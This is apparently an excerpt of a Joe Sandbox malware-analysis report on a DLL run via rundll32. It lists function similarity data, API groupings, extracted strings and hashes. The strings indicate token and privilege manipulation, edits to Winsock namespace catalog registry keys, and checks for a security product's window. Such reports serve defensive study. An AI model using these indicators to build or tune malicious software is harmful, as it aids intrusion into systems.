                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$Modulememset$CombineFileFreeHandleLibraryNamePath
                                                                                                  • String ID: ..\ipc\x64for32lib.dll$EnumProcessModules64$GetCommandLine64$GetCurrentDirectory64$GetModuleBaseNameW64$GetModuleFileNameExW64$GetModuleInformation64$IsProcessWow64Process$NtQueryInformationProcess64$NtQueryInformationThread64$ReadProcessMemory64
                                                                                                  • API String ID: 3359005274-2277939915
                                                                                                  • Opcode ID: 11406f1aeae7bd1ca1e9419c163a9dd1d65d254f22157801c59e7a4b8def0cf2
                                                                                                  • Instruction ID: 36480451210aca2b5e6fe81c352119384c097133635e903ecd0715684d47c6ca
                                                                                                  • Opcode Fuzzy Hash: 11406f1aeae7bd1ca1e9419c163a9dd1d65d254f22157801c59e7a4b8def0cf2
                                                                                                  • Instruction Fuzzy Hash: 2D512532201F5AA2EEA58F51E99439833A5FB4C7C0F549525EA5907A60DF38D3B9C710
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmove$File$CloseHandle$ByteCharCreateMultiReadSizeWide_wcsicmp
                                                                                                  • String ID: <script$<script
                                                                                                  • API String ID: 3854916350-2095320664
                                                                                                  • Opcode ID: aabe63095d4014b66694cbd9da80869a4679e39a58ece0fe403894298f6a2f9d
                                                                                                  • Instruction ID: f153a338753de2324ddff23d5d348aafdead37974da18f2bc7ac3ae69100bf45
                                                                                                  • Opcode Fuzzy Hash: aabe63095d4014b66694cbd9da80869a4679e39a58ece0fe403894298f6a2f9d
                                                                                                  • Instruction Fuzzy Hash: 4CE1C07120068986EA9BDF1698943F977A1FB49BC0F84C116FA5A47B91DF38CB4ED304
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Token$CloseHandleInformationProcess$AdjustBlockCreateEnvironmentErrorLastPrivilegesUser$ActiveConsoleCurrentDestroyDuplicateLookupOpenPrivilegeQuerySessionValuememset
                                                                                                  • String ID: SeTcbPrivilege$h$winsta0\default
                                                                                                  • API String ID: 2730501308-2823425829
                                                                                                  • Opcode ID: da626f246ce0b3925ee1fe27a827f12215fb960ca2972f5f4b6fa681b72b113d
                                                                                                  • Instruction ID: 63acb98c3057d7eee2a2f85741aa180b658631cb3bbab8e9928767d1695d7121
                                                                                                  • Opcode Fuzzy Hash: da626f246ce0b3925ee1fe27a827f12215fb960ca2972f5f4b6fa681b72b113d
                                                                                                  • Instruction Fuzzy Hash: A4A11072608B8486E7A1CF65F8507DAB7E4F7CC794F518125EA8983B68DF38C649CB04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LookupPrivilegeTokenValue$CloseHandleProcess$AdjustAllocateCreateCurrentFreeInformationInitializeLengthOpenPrivilegesRestricted
                                                                                                  • String ID: SeIncreaseWorkingSetPrivilege$SeShutdownPrivilege$SeTimeZonePrivilege$SeUndockPrivilege
                                                                                                  • API String ID: 51528658-3108072533
                                                                                                  • Opcode ID: e33c9bce59f9407c2e2ff38a6d92360040c7285e03c52f3c2110e53bb262eff8
                                                                                                  • Instruction ID: e90fc643d0e92dc4c713161bffc3fffdb9ad8c0d1725e2c558d965ce0668d002
                                                                                                  • Opcode Fuzzy Hash: e33c9bce59f9407c2e2ff38a6d92360040c7285e03c52f3c2110e53bb262eff8
                                                                                                  • Instruction Fuzzy Hash: 5E511972604B45DAE791CF61E8807DDB7B4F788B88F41811AEA5A47B68CF38C319CB04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp$??3@memset
                                                                                                  • String ID: Application$Applications/$Applications\$Progid$\OpenWithList$\OpenWithProgids$\UserChoice
                                                                                                  • API String ID: 3035816649-3026584011
                                                                                                  • Opcode ID: c3856a03b375e45892a4d72ef0243309f0eef955c225044f7e3de6569f4e6054
                                                                                                  • Instruction ID: 8735dd277f86c71873612ff2c024f3d2b305f3a14da21f48fef006481f506be5
                                                                                                  • Opcode Fuzzy Hash: c3856a03b375e45892a4d72ef0243309f0eef955c225044f7e3de6569f4e6054
                                                                                                  • Instruction Fuzzy Hash: 19429172700A4982EBA2DF65D8407DD77A1F789BE8F408212EE5D57BA9DF38C649C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$Close$Open$Enumfree
                                                                                                  • String ID: HKEY_LOCAL_MACHINE\$\Components\$\Features\$\Products\
                                                                                                  • API String ID: 1285027818-2258373985
                                                                                                  • Opcode ID: 9906bf7cd91924df8938282da413fefd9331e0d97fbadb0acae730663cf89f7c
                                                                                                  • Instruction ID: 6311c4a4e92b2eb2b6e61e2371f742115398930d0f6aaa53fdf69de799299566
                                                                                                  • Opcode Fuzzy Hash: 9906bf7cd91924df8938282da413fefd9331e0d97fbadb0acae730663cf89f7c
                                                                                                  • Instruction Fuzzy Hash: 9C126F72218AC891FAB2EB55E8453DAB365FB897C4F448111FA8E43A99DF3DC749C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalLibraryLoadResourceSection$ErrorLastModule$CountEnterFileFindFreeHandleInitializeLeaveNameSizeofSpin_errnomemmovememset
                                                                                                  • String ID: APPID$Module$Module_Raw$REGISTRY
                                                                                                  • API String ID: 1685702935-2529269209
                                                                                                  • Opcode ID: 3ceff26221d8725232ae8591cbe8c72322095ba2c2c9e72f7b8b6d0864ba4b02
                                                                                                  • Instruction ID: 1170741c672b2f4bc32c1c4dc3a7fce7b8275b676f47fdb2797edeea2ade6d42
                                                                                                  • Opcode Fuzzy Hash: 3ceff26221d8725232ae8591cbe8c72322095ba2c2c9e72f7b8b6d0864ba4b02
                                                                                                  • Instruction Fuzzy Hash: 29D18132705B8886FBA2DBA5E8403DA73A0F7897D4F509125BA5D47BA5EF38C649C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterLeave$HeapInfoOpenProcessQuerywcsstr
                                                                                                  • String ID: %s\%s$%s\NameSpace_Catalog5\Catalog_Entries\%012d
                                                                                                  • API String ID: 3416916155-2281247154
                                                                                                  • Opcode ID: 851d72f758c609aaf0f7580462004af6cc936b62e1bcf46d8cf7636727f3a395
                                                                                                  • Instruction ID: ff7a32f2b868f52803f629acb27a054862175391eb200bc512a22fc71bba3e47
                                                                                                  • Opcode Fuzzy Hash: 851d72f758c609aaf0f7580462004af6cc936b62e1bcf46d8cf7636727f3a395
                                                                                                  • Instruction Fuzzy Hash: A332AE72700B8886EB92DF64E8803DD33A0F74A7D8F10852AEA5D477A5DF38C699C704
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Windowmemset$MessageQuerySendTimeoutValue$CloseFindForegroundOpenmemmove
                                                                                                  • String ID: MsgCenter$Q360SafeMonClass$TS2P$activeapp$activeweb
                                                                                                  • API String ID: 3772276521-2728888700
                                                                                                  • Opcode ID: 252ce8677bfb522a4b6632ad157aa9371a8792e99c65b85e20036a72b1270932
                                                                                                  • Instruction ID: ee8cae4e48a5beadbc07239537d79e19b069e47090ef93ff609d4821bf219365
                                                                                                  • Opcode Fuzzy Hash: 252ce8677bfb522a4b6632ad157aa9371a8792e99c65b85e20036a72b1270932
                                                                                                  • Instruction Fuzzy Hash: C1D19172604B4886EB51DF25E8403DE7761F789BE8F608215EAAD43BE5DF38C649CB40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenmemset$QueryValue_wcsicmp$Enummemmoveswprintf
                                                                                                  • String ID: Device Parameters$Driver$EDID
                                                                                                  • API String ID: 3978137082-2299925461
                                                                                                  • Opcode ID: b95cd2e3d8507b9a87a60e61deae70fe2a7455a91287d77eb7c845bd1ab5848f
                                                                                                  • Instruction ID: 9305dd9bcaed70cdf0d37fe600fca7c095d3f7e64be226b027989fd01a2a7e0b
                                                                                                  • Opcode Fuzzy Hash: b95cd2e3d8507b9a87a60e61deae70fe2a7455a91287d77eb7c845bd1ab5848f
                                                                                                  • Instruction Fuzzy Hash: E481A632615A8886EBA2CF65E8407DAB3A0FB897C4F048115FE8C57665EF39C74DCB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                                                                  • String ID:
                                                                                                  • API String ID: 439134102-0
                                                                                                  • Opcode ID: a46c37f9d43addc7902de8a620b67c5d7e9bf97180802cf92c4b38db29028bd0
                                                                                                  • Instruction ID: 174b29e8cd160b97723a189948c8d9aaf29f8d7efdb631c6e245ba98a82576f0
                                                                                                  • Opcode Fuzzy Hash: a46c37f9d43addc7902de8a620b67c5d7e9bf97180802cf92c4b38db29028bd0
                                                                                                  • Instruction Fuzzy Hash: 21826D76604B4982FB96CB29E8403DA33A1F789BE4F15C125EE5D477A4EF38CA49C350
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free$calloc$memset
                                                                                                  • String ID: -$]$]
                                                                                                  • API String ID: 2591755499-1349866957
                                                                                                  • Opcode ID: 2679cd0fb79ab9e79cb7ec4cb87940f65e1566cfba3dc15da5d319deb0b258b9
                                                                                                  • Instruction ID: 1d85a50f400dc416e5d0a718f77556582d5ce19bdf984b68484f18af02043cc0
                                                                                                  • Opcode Fuzzy Hash: 2679cd0fb79ab9e79cb7ec4cb87940f65e1566cfba3dc15da5d319deb0b258b9
                                                                                                  • Instruction Fuzzy Hash: BCA1D272706BC892EB96CB16D0403A977A1F74D780F449616EB8A17B81DF39D2B9D300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Timefree$??3@System$FileMutexRelease
                                                                                                  • String ID: AND $ SLEV = %d $ TYPE = %d$ WHERE $DELETE FROM 'MT' $INSERT INTO "MT" VALUES ( ?,?,?,?,?,?,?,?,?,?,?,?,NULL ) $ModName LIKE '$TimeStamp < %I64d;
                                                                                                  • API String ID: 2360919559-3261407791
                                                                                                  • Opcode ID: 0fdc13341be9cf7c256e26cb2936a3b5a8a79f5d9c0121a176094682301e8f56
                                                                                                  • Instruction ID: fbbc87ecfbf22c2b8803d4662eccf4799cfebf60f86054df91e993a66dbd8da4
                                                                                                  • Opcode Fuzzy Hash: 0fdc13341be9cf7c256e26cb2936a3b5a8a79f5d9c0121a176094682301e8f56
                                                                                                  • Instruction Fuzzy Hash: B102B332711A4C85FFB29BA5D4403DD2361AB887D8F148627BE2E6B7D4DE3AC649C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$CloseDeleteEnterLeaveOpenmemset
                                                                                                  • String ID: %s\%s$Catalog_Entries$Catalog_Entries64$NameSpace_Catalog5$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s\%012d
                                                                                                  • API String ID: 2413450229-732542554
                                                                                                  • Opcode ID: 5d3b3c8892c10d7fff7567f6933cd8fc0a8177a7f871dcf3f8d0113f8f36deb6
                                                                                                  • Instruction ID: 3ab1713314ff84c9548747a70e29f101a91a5434d94fe8d6158548384223fcd6
                                                                                                  • Opcode Fuzzy Hash: 5d3b3c8892c10d7fff7567f6933cd8fc0a8177a7f871dcf3f8d0113f8f36deb6
                                                                                                  • Instruction Fuzzy Hash: 69C1DEB1701A4D82EEA6DB29E8457D963A0F788BD4F04C422FE0D1B7A5DF39C64AC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CA7
                                                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CD3
                                                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008D81
                                                                                                  • lstrcmpiW.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000), ref: 00000001800083C8
                                                                                                  • lstrcmpiW.KERNEL32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 00000001800083E6
                                                                                                  • CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 0000000180008457
                                                                                                  • CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 0000000180008541
                                                                                                  • CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 000000018000855D
                                                                                                  • RegSetValueExW.ADVAPI32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 00000001800085C2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharNext$lstrcmpi$Value
                                                                                                  • String ID:
                                                                                                  • API String ID: 3520330261-0
                                                                                                  • Opcode ID: e6b0475dc37a1ccc9b5f93fb3a52cf7f5178555000e54cf4b197682acd1df91f
                                                                                                  • Instruction ID: 54a0f5542f62afcd6411b2081a4c08be2fbbe8d603b0a409542dd15f8ed12d0a
                                                                                                  • Opcode Fuzzy Hash: e6b0475dc37a1ccc9b5f93fb3a52cf7f5178555000e54cf4b197682acd1df91f
                                                                                                  • Instruction Fuzzy Hash: D3D1643260864982FBA2DB15E8543DA76E1FB9C7D0F91C121BA99476E4EF38C74DD700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wtoi$Value$??3@memset
                                                                                                  • String ID: %d|%d|%d|%d$MontiorInfo$MsgCenter
                                                                                                  • API String ID: 1219333133-3184008533
                                                                                                  • Opcode ID: 5a13214d90345a148425d7b4cec5787b2bbb9191422684e28f36f8c5be619ee2
                                                                                                  • Instruction ID: 3a97e8b4d36ab7b0ff62b7c8c746816c118d75ce1dcaba847e92933311b9e76e
                                                                                                  • Opcode Fuzzy Hash: 5a13214d90345a148425d7b4cec5787b2bbb9191422684e28f36f8c5be619ee2
                                                                                                  • Instruction Fuzzy Hash: FDC1B472604B4887EB51CF29E84039E77A1F789BA4F208216FAAD577A4DF78D644CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: Version$AddressHandleModuleProcValueatoimemset
                                                                                                  • String ID: CurrentVersion$RtlGetVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                                  • API String ID: 1009632096-1820686997
                                                                                                  • Opcode ID: 96873d62ae8b00b27b2edc00cc4e017e8c26c7791766384428e26c81b31d8715
                                                                                                  • Instruction ID: 603b8f84a57364ab934b969a098bbde4f8155cf87e7eb2653b8acdc6aa15b94a
                                                                                                  • Opcode Fuzzy Hash: 96873d62ae8b00b27b2edc00cc4e017e8c26c7791766384428e26c81b31d8715
                                                                                                  • Instruction Fuzzy Hash: 0F416D31615A498AF792CF20EC883DB77A0F78C7A5F918115F56A426A8DF3CD24CCB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
